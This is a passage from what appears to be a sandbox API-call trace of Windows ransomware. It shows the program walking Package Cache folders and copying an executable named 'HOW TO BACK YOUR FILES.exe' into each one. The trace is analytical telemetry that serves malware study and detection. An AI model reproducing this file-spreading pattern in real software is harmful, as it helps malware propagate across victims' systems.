ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.485] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.485] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.485] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0090.485] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0090.485] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.485] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.485] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.486] GetLastError () returned 0x0 [0090.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.486] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.486] CloseHandle (hObject=0x120) returned 1 [0090.486] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.486] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.486] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.486] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.486] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0090.487] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0090.487] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.487] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.487] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.487] GetLastError () returned 0x0 [0090.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.487] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.487] CloseHandle (hObject=0x120) returned 1 [0090.488] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.488] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x605ec540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x605ec540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.488] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.488] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.488] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0090.488] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0090.488] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.488] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.489] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.489] GetLastError () returned 0x0 [0090.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.489] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.489] CloseHandle (hObject=0x120) returned 1 [0090.489] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.489] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.489] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.489] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.490] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0090.490] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0090.490] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.490] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.491] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.491] GetLastError () returned 0x0 [0090.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.491] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.491] CloseHandle (hObject=0x120) returned 1 [0090.491] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.491] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.491] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.491] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.491] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0090.492] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0090.492] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.492] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.492] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.492] GetLastError () returned 0x0 [0090.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.492] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.493] CloseHandle (hObject=0x120) returned 1 [0090.493] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.493] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x622a2ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x622a2ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.493] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.493] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.493] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0090.493] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0090.493] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.493] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.494] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.494] GetLastError () returned 0x0 [0090.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.494] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.494] CloseHandle (hObject=0x120) returned 1 [0090.494] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.494] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x6260ee40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6260ee40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.495] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.495] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0090.495] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0090.495] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.495] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.495] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.496] GetLastError () returned 0x0 [0090.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.496] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.496] CloseHandle (hObject=0x120) returned 1 [0090.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.496] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.496] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.496] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.496] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0090.496] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0090.497] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.497] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.497] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.497] GetLastError () returned 0x0 [0090.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.497] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.497] CloseHandle (hObject=0x120) returned 1 [0090.498] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.498] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.498] lstrcmpiW 